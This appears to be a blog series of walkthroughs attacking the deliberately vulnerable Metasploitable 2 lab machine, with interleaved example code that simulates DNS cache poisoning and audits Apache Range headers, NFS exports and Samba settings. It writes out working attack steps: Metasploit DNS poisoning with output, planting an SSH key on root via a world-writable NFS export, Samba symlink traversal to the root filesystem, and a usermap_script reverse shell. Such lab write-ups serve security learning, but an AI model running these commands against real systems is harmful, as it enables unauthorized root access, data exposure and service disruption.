This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver.  This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain.  By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache.  This insertion completely replaces the original nameserver
records for the target domain.

Example
=======

# /msf3/msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

       =[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 73 aux

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

b.iana-servers.net.
a.iana-servers.net.

msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*]  Got an NS record: example.com.            171957  IN      NS      b.iana-servers.net.
[*]   Querying recon nameserver for address of b.iana-servers.net....
[*]    Got an A record: b.iana-servers.net.     171028  IN      A       193.0.0.236
[*]     Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*]     b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*]  Got an NS record: example.com.            171957  IN      NS      a.iana-servers.net.
[*]   Querying recon nameserver for address of a.iana-servers.net....
[*]    Got an A record: a.iana-servers.net.     171414  IN      A       192.0.34.43
[*]     Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*]     a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed

msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

dns01.metasploit.com.

It’s worth noting the “Check” switch doesn’t work anymore.

The second module I tried was Metasploit's bailiwicked_host auxiliary; the original post shows the process in two embedded videos.

Again, neither of these exploits worked for me, but hopefully you may have more success.
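Two things in the module output above decide whether this attack can work at all: the check's verdict that the server uses a static source port (50391), and what the target resolver does with the records it is fed. As an added example that is neither the module's code nor anything from the post, here is a toy model of the attack in Ruby. The resolver, the attacker loop, the random hostnames and every address are simulated; the 16-bit transaction ID space and the 1024-65535 port range are the real sizes, 50391 is the static port from the output, and a resolver with a bailiwick check is assumed (it caches a record only if its name lies within the zone the query was sent for).

```ruby
#!/usr/bin/env ruby
# Added example, not from the post or from bailiwicked_domain: a simulated
# resolver and the spoofing loop, to show why a static source port makes the
# race winnable and why the glue for the new nameserver is dropped while the
# NS record for the zone is kept. Nothing here touches the network.

TXID_SPACE  = 65_536
STATIC_PORT = 50_391   # the source port the module's check reported above

def in_bailiwick?(name, zone)
  name == zone || name.end_with?(".#{zone}")
end

class ToyResolver
  attr_reader :cache, :rejected

  def initialize(random_ports:, rng:)
    @random_ports = random_ports
    @rng = rng
    @cache = {}          # [name, type] => value
    @outstanding = {}    # [txid, port] => [qname, zone]
    @rejected = Hash.new(0)
  end

  # Send a query for qname to zone's nameservers; returns what the wire carries.
  def query(qname, zone)
    txid = @rng.rand(TXID_SPACE)
    port = @random_ports ? @rng.rand(1024..65_535) : STATIC_PORT
    @outstanding[[txid, port]] = [qname, zone]
    [txid, port]
  end

  # Accept a response only if (txid, port, qname) match an outstanding query;
  # cache each record only if its name lies inside the zone that was asked.
  def deliver(txid:, port:, qname:, records:)
    key = [txid, port]
    pending = @outstanding[key]
    if pending.nil? || pending[0] != qname
      @rejected[:no_matching_query] += 1
      return false
    end
    @outstanding.delete(key)
    zone = pending[1]
    records.each do |name, type, value|
      if in_bailiwick?(name, zone)
        @cache[[name, type]] = value
      else
        @rejected[:out_of_bailiwick] += 1
      end
    end
    true
  end
end

# The module's loop: ask for a random hostname under the zone, then race the
# genuine answer with `guesses` forged responses carrying an in-bailiwick NS
# record for the zone plus out-of-bailiwick glue for the new server.
def poison_nameservers(resolver, zone:, new_ns:, guesses:, max_queries:, rng:, known_port: nil)
  max_queries.times do |i|
    qname = "#{rng.bytes(4).unpack1('H*')}.#{zone}"
    real_txid, real_port = resolver.query(qname, zone)
    forged = [[qname, :A, "203.0.113.9"], [zone, :NS, new_ns], [new_ns, :A, "203.0.113.53"]]
    guesses.times do
      hit = resolver.deliver(txid: rng.rand(TXID_SPACE),
                             port: known_port || rng.rand(1024..65_535),
                             qname: qname, records: forged)
      return i + 1 if hit
    end
    # The genuine answer arrives; this round of the race is lost.
    resolver.deliver(txid: real_txid, port: real_port, qname: qname,
                     records: [[qname, :A, "192.0.2.1"]])
  end
  nil
end

def kaminsky_demo(seed: 2013, guesses: 40, max_queries: 20_000)
  zone, new_ns = "example.com.", "dns01.metasploit.com."
  results = {}
  [[:static_port, false, STATIC_PORT], [:random_port, true, nil]].each do |label, random, known|
    rng = Random.new(seed)
    r = ToyResolver.new(random_ports: random, rng: rng)
    q = poison_nameservers(r, zone: zone, new_ns: new_ns, guesses: guesses,
                           max_queries: max_queries, rng: rng, known_port: known)
    results[label] = { queries_until_poisoned: q, ns_in_cache: r.cache[[zone, :NS]],
                       glue_cached: r.cache.key?([new_ns, :A]), rejected: r.rejected.dup }
  end
  results
end

if __FILE__ == $PROGRAM_NAME
  kaminsky_demo.each { |label, res| puts "#{label}: #{res.inspect}" }
end
```

With the port known, only the 16-bit transaction ID has to be guessed, so 40 forged replies per query win on average after a couple of thousand queries, in line with the "Poisoning successful after 13250 attempts" the module documentation shows; with the port randomised the same budget is hopeless. Note also what the poisoned cache contains: the NS record for example.com. points at dns01.metasploit.com., but the forged A record for that name was rejected as out of bailiwick, so the resolver will still look the new server's address up on its own.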

Metasploitable 2: Apache Killer DoS


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)

The Nessus scan had this to say regarding port 80:

55976 – Apache HTTP Server Byte Range DoS
Synopsis
The web server running on the remote host is affected by a denial of service vulnerability.
Description
The version of Apache HTTP Server running on the remote host is affected by a denial of service vulnerability. Making a series of HTTP requests with overlapping ranges in the Range or Request-Range request headers can result in memory and CPU exhaustion. A remote, unauthenticated attacker could exploit this to make the system unresponsive.

Exploit code is publicly available and attacks have reportedly been observed in the wild.

And so I went hunting for code applicable to this version of the Apache server (2.2.8) and found it here, aptly called "Apache Killer". The write-up that accompanied it says:

For the last few days OSS web admins have been very concerned about a recent Apache HTTPd denial of service. "Apache Killer" (written by Kingcope) is a Perl script that causes a remote DoS through memory exhaustion on an Apache httpd server. The script sends large numbers of HEAD requests with lots of ranges, resulting in memory being swapped to the filesystem on the remote side and making the remote system unstable.

While the vulnerability has been publicly known since August 19, an official advisory hasn't been published yet. However, a temporary workaround must be found in order to avoid regular system crashes. The most efficient and elegant solution that I have read is using the mod_rewrite engine.

Let’s get our hands dirty to see how we can deal with the DoS remote attack.

The target system is an Ubuntu 8.04 with an Apache/2.2.8 installation. Initially, I ran the Perl script to confirm that the system is vulnerable.

I downloaded the code to my desktop, named the file killapache.pl and ran it in the terminal:

~/Desktop# perl killapache.pl 192.168.1.103 50
Host does not seem vulnerable

No matter what I tried I received the same not-vulnerable message. I was quite disappointed, as this would have been my first DoS attack.
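What the Nessus finding calls "overlapping ranges" is easy to see once the header is parsed. As an added example, which is neither the post's code nor killapache.pl, here is a Ruby parser for the Range header together with the kind of check the interim mod_rewrite workarounds applied (rejecting requests that carry more than a handful of ranges) plus an overlap test. The five-range limit and all sample headers are this example's own choices, and `killer_style_range` only mimics the shape of the header the script sends, assumed here to be one open range followed by many small overlapping ones.

```ruby
#!/usr/bin/env ruby
# Added example, not from the post and not the killapache.pl script: parse a
# Range header, resolve its ranges against a resource size, and decide whether
# a request is the abusive kind the byte-range DoS relied on.

MAX_RANGES = 5   # limit chosen for this example, in the spirit of the 2011 mod_rewrite workarounds

# "bytes=0-99,-500,1000-" -> [[0, 99], [nil, 500], [1000, nil]]
# nil first = suffix range (last N bytes); nil last = open-ended range.
def parse_byte_ranges(header)
  m = header.to_s.strip.match(/\Abytes=(.+)\z/i)
  return nil unless m
  m[1].split(",").map do |spec|
    a, b = spec.strip.split("-", 2)
    [a.to_s.empty? ? nil : a.to_i, b.to_s.empty? ? nil : b.to_i]
  end
end

# Resolve suffix and open-ended ranges against the resource size so that all
# ranges become concrete [first, last] pairs that can be compared.
def normalize_ranges(ranges, total)
  ranges.map do |first, last|
    if first.nil?
      [[total - last, 0].max, total - 1]
    else
      [first, [last || (total - 1), total - 1].min]
    end
  end
end

def overlapping?(normalized)
  normalized.sort.each_cons(2).any? { |(_s1, e1), (s2, _e2)| s2 <= e1 }
end

# true = reject: too many ranges, or ranges that overlap each other.
def abusive_range?(header, total: 1024, max_ranges: MAX_RANGES)
  ranges = parse_byte_ranges(header)
  return false if ranges.nil?
  return true if ranges.length > max_ranges
  overlapping?(normalize_ranges(ranges, total))
end

# Header shape assumed for Apache Killer: "bytes=0-,5-0,5-1,5-2,...,5-1299".
def killer_style_range(count = 1300)
  "bytes=0-" + (0...count).map { |i| ",5-#{i}" }.join
end

if __FILE__ == $PROGRAM_NAME
  ["bytes=0-99,100-199", "bytes=0-100,50-200", "bytes=-100,900-1000",
   killer_style_range].each do |h|
    n = parse_byte_ranges(h).length
    puts format("%-7s %5d range(s)  %s", abusive_range?(h) ? "REJECT" : "ok", n, h[0, 40])
  end
end
```

Apache's own fix did the same thing server-side (a request with overlapping or excessive ranges is answered as if no Range header were present); the check above is the equivalent at a reverse proxy or WAF, and it is also a quick way to confirm what a scanner such as killapache.pl is actually sending.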

If we scan with OWASP ZAP, or simply put the URL of our Metasploitable 2 into a browser, we can see that there are various applications running on the server on port 80 that may provide additional attack vectors; however, at this time I was solely interested in attacking the Apache server itself.

I will be returning to explore some of these services in due course.

Metasploitable 2: RPC (Remote Procedure Call) Server


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
111/tcp   open  rpcbind     2 (RPC #100000)

The SANS Institute has this to say about rpcbind and Portmapper:

What is Remote Procedure Call?

Remote Procedure Call is a technique for building distributed systems, and client/server applications. Basically, it allows a program on one machine to call a subroutine on another machine. RPC is not a transport protocol: rather, it is a method of using existing communications features in a transparent way. Request For Comments (RFC) 1833 (1-3) defines specifics about Remote Procedure Call, and some of its most well known aspects that apply to security specialists, particularly Port Mapper and rpcbind. The remote procedure protocol is documented and discussed in rfc 1790 (specific to Sun rpc) and rfc 1570 has additional information. If you use Unix servers and workstations you may be aware that there are applications that use RPC. There are NFS daemons, lock managers, and license managers. If you are a security manager, you will know that there are many known exploits against a large list of services (and more discovered every day). The first step to dishonorably exploit a service is to determine if it is running on a target system. This is where Portmapper and rpcbind, and well-known port 111 come into play. This is also why security administrators see many probes and scans of port 111.

Portmapper and rpcbind

The port mapper program maps a RPC program and version numbers to transport-specific port numbers. This program makes dynamic binding of remote programs possible. RPC server programs use ephemeral ports – thus the calling/client routine needs to access a well known port to be able to find those ports. Servers register themselves with a registrar – the port mapper (called rpcbind in Sun's SVR4 and other systems using TI-RPC). This is done at port 111 for both UDP and TCP. Access to port 111 allows the calling client to query and identify the ephemeral ports where the needed server is running, and thereby make the connection to do business. When a client makes an RPC call to a given program number, it first connects to rpcbind on the target system to determine the address where the RPC request should be sent. Basically, the active port 111 is going to have a list of all active services, and tell the requesting client where to go to connect. However, security personnel should know that under some versions of Unix, and Solaris, rpcbind not only listens on the TCP/UDP port 111, but it also listens on UDP ports greater than 32770. The exact port number is dependent on the OS release and architecture. Thus, packet filtering devices, router ACL blocks, and firewalls that are configured to block access to rpcbind/portmapper at only port 111, may be subverted by sending UDP requests to rpcbind listening above port 32770. This vulnerability may allow an unauthorized user to obtain remote RPC information from a remote system even if port 111 is being blocked.

So Why DO We Care?

RPC information located at Port 111 is a place to find out where services are running. Numerous vulnerabilities exist, along with exploits ready and waiting for services such as rpcbind and rpcmountd. Network File Service (NFS) has a known rpc-update exploit, the Network Information Service (NIS) update daemon rpc.ypupdated contains vulnerabilities in how it passes commands to certain function calls. This could allow a remote attacker to trick the service into executing arbitrary commands on the system with root privileges. Additionally, client server environments that use remote program calls and port 111 to register and make themselves available, are unfortunately also listing their availability to the less-than nice people who are trying to crack your system. For the unprotected systems that have portmapper running on port 111, a simple “rpcinfo” request is adequate for the potential exploiter to obtain a list of all services running.

So, we begin with “rpcinfo” in our Terminal to detect the services running on Metasploitable 2:

:~# rpcinfo -p 192.168.1.103
program vers proto   port  service
100000    2   tcp    111  portmapper
100000    2   udp    111  portmapper
100024    1   udp  39140  status
100024    1   tcp  57708  status
100003    2   udp   2049  nfs
100003    3   udp   2049  nfs
100003    4   udp   2049  nfs
100021    1   udp  53632  nlockmgr
100021    3   udp  53632  nlockmgr
100021    4   udp  53632  nlockmgr
100003    2   tcp   2049  nfs
100003    3   tcp   2049  nfs
100003    4   tcp   2049  nfs
100021    1   tcp  59788  nlockmgr
100021    3   tcp  59788  nlockmgr
100021    4   tcp  59788  nlockmgr
100005    1   udp  59646  mountd
100005    1   tcp  52735  mountd
100005    2   udp  59646  mountd
100005    2   tcp  52735  mountd
100005    3   udp  59646  mountd
100005    3   tcp  52735  mountd

Lots of information here. I’m going to concentrate on the NFS (Network File System) daemon as this is well documented.

First we begin with “showmount”, which queries the mount daemon on a remote host for information about the state of the NFS server:

~# showmount -e 192.168.1.103
Export list for 192.168.1.103:
/ *

The “/” shows the filesystem is writable and owned by root. Because SSH is running we generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account’s authorized_keys file:

:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
93:8d:0f:e5:06:0a:2d:c1:5c:e4:39:8f:84:51:58:0a root@Dexter
The key's randomart image is:
+--[ RSA 2048]----+
|  Eoo*=          |
|   .+B .         |
|    = * . .      |
|     + = B       |
|      o S +      |
|         =       |
|          .      |
|                 |
|                 |
+-----------------+

:~# mkdir /tmp/r00t

:~# mount -t nfs 192.168.1.103:/ /tmp/r00t/ -o nolock

:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys

:~# umount /tmp/r00t

:~# ssh root@192.168.1.103
Last login: Mon Nov 11 10:01:59 2013 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have mail.
root@metasploitable:~#

Here’s a video of the above process:
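What made the export above exploitable is the server-side /etc/exports entry behind it. As an added example (not from the original post), this Python audits exports(5) entries and the showmount -e view for a world-exported root and for rw combined with no_root_squash, the setting that lets a client's root write to /root/.ssh as root; SAMPLE_EXPORTS is constructed, not the target's file.

```python
import re

# Constructed /etc/exports, not taken from the target; its first line is the
# server-side counterpart of the "/ *" that showmount reported above.
SAMPLE_EXPORTS = """\
/                *(rw,no_root_squash,sync)
/srv/public      192.168.1.0/24(ro,sync) @trusted(rw,root_squash)
/home/shared     *.corp.example(rw)
# a path with no client list is exported to everyone (exportfs warns about it)
/srv/legacy
"""

CLIENT_SPEC = re.compile(r"^([^(\s]+)(?:\(([^)]*)\))?$")


def parse_exports(text):
    """Return [(path, client, options)] for every client entry in /etc/exports.
    Options are filled in the way exportfs does: ro unless rw is given, and
    root_squash unless no_root_squash is given."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        clients = parts[1].split() if len(parts) > 1 else ["*"]
        for spec in clients:
            match = CLIENT_SPEC.match(spec)
            if not match:
                continue
            opts = {o.strip() for o in (match.group(2) or "").split(",") if o.strip()}
            if "rw" not in opts:
                opts.add("ro")
            if "no_root_squash" not in opts:
                opts.add("root_squash")
            entries.append((path, match.group(1), opts))
    return entries


def parse_showmount(text):
    """Turn 'showmount -e' output (the client-side view) into (path, clients)."""
    exports = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("Export list"):
            continue
        parts = line.split()
        exports.append((parts[0], parts[1].split(",") if len(parts) > 1 else ["*"]))
    return exports


def is_wildcard(client):
    """'*' and '*.domain' patterns match arbitrary hosts."""
    return client.startswith("*")


def audit_exports(entries):
    """Flag the export settings that made the walkthrough above possible."""
    findings = []
    for path, client, opts in entries:
        if path == "/":
            findings.append((path, client, "root filesystem exported"))
        if is_wildcard(client):
            findings.append((path, client, "exported to any host"))
        if "rw" in opts and "no_root_squash" in opts:
            findings.append((path, client,
                             "rw with no_root_squash: a client's root writes as root here"))
        elif "rw" in opts and is_wildcard(client):
            findings.append((path, client, "writable by any host"))
    return findings


if __name__ == "__main__":
    for finding in audit_exports(parse_exports(SAMPLE_EXPORTS)):
        print("%-14s %-18s %s" % finding)
    # The client-side view from the walkthrough, reduced to the same structure.
    print(parse_showmount("Export list for 192.168.1.103:\n/ *\n"))
```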

Metasploitable 2: Samba Server

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

What is Samba?

Samba is software that can be run on a platform other than Microsoft Windows, for example, UNIX, Linux, IBM System 390, OpenVMS, and other operating systems. Samba uses the TCP/IP protocol that is installed on the host server. When correctly configured, it allows that host to interact with a Microsoft Windows client or server as if it is a Windows file and print server.

SMBD is part of Samba and is the server daemon that provides filesharing and printing services to Windows clients. The server provides filespace and printer services to clients using the SMB (or CIFS) protocol.

We can use the smbclient in the attacking Terminal to investigate the Samba Server. When prompted for the root password simply hit enter.

~# smbclient -L //192.168.1.103
Enter root's password: 
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

	Server               Comment
	---------            -------
	METASPLOITABLE       metasploitable server (Samba 3.0.20-Debian)

	Workgroup            Master
	---------            -------
	HOME                 BTHUB3
	WORKGROUP            METASPLOITABLE

We can dig down deeper into the tmp if we wish:

:~# smbclient //192.168.1.103/tmp
Enter root's password: 
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> ls
  .                                   D        0  Tue Nov 12 07:58:34 2013
  ..                                 DR        0  Sun May 20 20:36:12 2012
  5251.jsvc_up                        R        0  Mon Nov 11 15:02:52 2013
  .ICE-unix                          DH        0  Mon Nov 11 15:01:07 2013
  .X11-unix                          DH        0  Mon Nov 11 15:01:52 2013
  .X0-lock                           HR       11  Mon Nov 11 15:01:52 2013

		56891 blocks of size 131072. 42480 blocks available
smb: \>

We can check if this is writable:

smb: \> mkdir test
smb: \> ls
  .                                   D        0  Tue Nov 12 08:00:45 2013
  ..                                 DR        0  Sun May 20 20:36:12 2012
  5251.jsvc_up                        R        0  Mon Nov 11 15:02:52 2013
  .ICE-unix                          DH        0  Mon Nov 11 15:01:07 2013
  .X11-unix                          DH        0  Mon Nov 11 15:01:52 2013
  .X0-lock                           HR       11  Mon Nov 11 15:01:52 2013
  test                                D        0  Tue Nov 12 08:00:45 2013

It is indeed writable.

Our investigations have revealed Samba version 3.0.20 and the associated exploit is well documented:

A user named “kcopedarookie” posted what they claim to be a video of a zero-day exploit in Samba on youtube yesterday.

The video shows modifications to smbclient allowing /etc/passwd to be downloaded from a remote server.

The issue is actually a default insecure configuration in Samba.

Quick FAQ: What do I do !

Set:

  wide links = no

in the [global] section of your smb.conf and restart smbd to eliminate this problem.

Longer FAQ: The real issue

The problem comes from a combination of two features in Samba, each of which on its own is useful to Administrators, but in combination allow users to access any file on the system that their logged in username has permissions to read (this is not a privilege escalation problem).

By default Samba ships with the parameter “wide links = yes”, which allows Administrators to locally (on the server) add a symbolic link inside an exported share which SMB/CIFS clients will follow.

As an example, given a share definition:

  [tmp]
	path = /tmp
	read only = no
	guest ok = yes

The administrator could add a symlink:

  $ ln -s /etc/passwd /tmp/passwd

and SMB/CIFS clients would then see a file called “passwd” within the [tmp] share that could be read and would allow clients to read /etc/passwd.

If the “wide links” parameter is set to “no”, any attempt to read this file will fail with an “access denied” error.

The problem occurs as Samba allows clients using the UNIX extensions (which are also turned on by default) to create symlinks on remotely mounted shares on which they have write access that point to any path on the file system.

This is by design, as applications running on UNIX clients may have good reasons to create symlinks anywhere on the filesystem they have write access that point to local files (such as /etc/passwd).

UNIX clients will resolve these links locally, but Windows clients will resolve them on the server. It is this combination that causes the problem.

All future versions of Samba will have the parameter “wide links” set to “no” by default, and the manual pages will be updated to explain this issue.
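The advisory's fix is a one-line smb.conf change. The Python below is an added example (not from the post or the Samba project) that parses an smb.conf, reports shares where wide links and unix extensions combine as described, and shows the finding clearing once wide links = no is applied in [global]; SAMPLE_SMB_CONF is a constructed fragment, not the target's configuration.

```python
# Constructed smb.conf fragment, not the target's; [tmp] mirrors the share
# definition in the advisory quoted above.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   unix extensions = yes

[tmp]
   path = /tmp
   read only = no
   guest ok = yes

[docs]
   path = /srv/docs
   read only = yes
   wide links = no
"""


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {param: value}}.  Samba treats
    parameter names case- and whitespace-insensitively, so names are
    normalised to lower case with single spaces."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            name, value = line.split("=", 1)
            conf[section][" ".join(name.lower().split())] = value.strip()
    return conf


def to_bool(value):
    return value.strip().lower() in ("yes", "true", "1")


def effective_bool(conf, share, param, default):
    """A share's own setting wins, then [global], then the compiled-in default."""
    for section in (share, "global"):
        value = conf.get(section, {}).get(param)
        if value is not None:
            return to_bool(value)
    return default


def is_writable(conf, share):
    """'writeable'/'writable' are the inverse of 'read only' (default yes)."""
    for alias in ("writeable", "writable"):
        value = conf.get(share, {}).get(alias)
        if value is not None:
            return to_bool(value)
    return not effective_bool(conf, share, "read only", True)


def audit_shares(conf, wide_links_default=True):
    """Report shares exposed by the advisory's combination of settings.
    wide_links_default=True models releases such as the 3.0.20 on the target,
    which shipped with 'wide links = yes'; the advisory says later releases
    flip that default to no."""
    findings = []
    unix_ext = effective_bool(conf, "global", "unix extensions", True)
    for share in conf:
        if share in ("global", "printers"):
            continue
        wide = effective_bool(conf, share, "wide links", wide_links_default)
        if wide and unix_ext:
            findings.append((share, "wide links + unix extensions: symlinks a client "
                                    "creates are followed server-side (symlink traversal)"))
        if effective_bool(conf, share, "guest ok", False) and is_writable(conf, share):
            findings.append((share, "guest-writable share"))
    return findings


def with_wide_links_disabled(conf):
    """Apply the advisory's fix ('wide links = no' in [global]) to a parsed config.
    A share-level 'wide links = yes' would still override it, which the audit
    above reports."""
    fixed = {section: dict(params) for section, params in conf.items()}
    fixed.setdefault("global", {})["wide links"] = "no"
    return fixed


if __name__ == "__main__":
    conf = parse_smb_conf(SAMPLE_SMB_CONF)
    print("before:", audit_shares(conf))
    print("after: ", audit_shares(with_wide_links_disabled(conf)))
```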

OK, to the Metasploit exploit: this Samba version follows symbolic links to anywhere on the filesystem by default, so we use Metasploit’s samba_symlink_traversal auxiliary module:

msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOST                       yes       The target address
RPORT      445              yes       Set the SMB service port
SMBSHARE                    yes       The name of a writeable share on the server
SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf auxiliary(samba_symlink_traversal) > set smbshare tmp
smbshare => tmp
msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.1.103\tmp\rootfs\

[*] Auxiliary module execution completed

If we now return to the smbclient, we will be served up with access to all of the disk’s contents from the rootfs folder:

:~# smbclient //192.168.1.103/tmp
Enter root's password: 
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> ls
  .                                   D        0  Tue Nov 12 08:35:42 2013
  ..                                 DR        0  Sun May 20 20:36:12 2012
  5251.jsvc_up                        R        0  Mon Nov 11 15:02:52 2013
  .ICE-unix                          DH        0  Mon Nov 11 15:01:07 2013
  .X11-unix                          DH        0  Mon Nov 11 15:01:52 2013
  .X0-lock                           HR       11  Mon Nov 11 15:01:52 2013
  rootfs                             DR        0  Sun May 20 20:36:12 2012
  test                                D        0  Tue Nov 12 08:00:45 2013

		56891 blocks of size 131072. 42480 blocks available
smb: \> cd rootfs
smb: \rootfs\> ls
  .                                  DR        0  Sun May 20 20:36:12 2012
  ..                                 DR        0  Sun May 20 20:36:12 2012
  initrd                             DR        0  Tue Mar 16 23:57:40 2010
  media                              DR        0  Tue Mar 16 23:55:52 2010
  bin                                DR        0  Mon May 14 05:35:33 2012
  lost+found                         DR        0  Tue Mar 16 23:55:15 2010
  mnt                                DR        0  Wed Apr 28 22:16:56 2010
  sbin                               DR        0  Mon May 14 03:54:53 2012
  initrd.img                          R  7929183  Mon May 14 05:35:56 2012
  home                               DR        0  Fri Apr 16 08:16:02 2010
  lib                                DR        0  Mon May 14 05:35:22 2012
  usr                                DR        0  Wed Apr 28 06:06:37 2010
  proc                               DR        0  Mon Nov 11 15:00:24 2013
  root                               DR        0  Mon Nov 11 15:01:51 2013
  sys                                DR        0  Mon Nov 11 15:00:28 2013
  boot                               DR        0  Mon May 14 05:36:28 2012
  nohup.out                           R     6542  Mon Nov 11 15:01:51 2013
  etc                                DR        0  Mon Nov 11 15:01:24 2013
  dev                                DR        0  Mon Nov 11 15:01:09 2013
  vmlinuz                             R  1987288  Thu Apr 10 18:55:41 2008
  opt                                DR        0  Tue Mar 16 23:57:39 2010
  var                                DR        0  Wed Mar 17 15:08:23 2010
  cdrom                              DR        0  Tue Mar 16 23:55:51 2010
  tmp                                 D        0  Tue Nov 12 08:35:42 2013
  srv                                DR        0  Tue Mar 16 23:57:38 2010

		56891 blocks of size 131072. 42480 blocks available
smb: \rootfs\>

We can also obtain a shell on the Samba host using Metasploit’s usermap_script exploit:

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo KBoA0aqYLD2VrWzT;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "KBoA0aqYLD2VrWzT\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:48635) at 2013-11-12 17:38:37 +0000

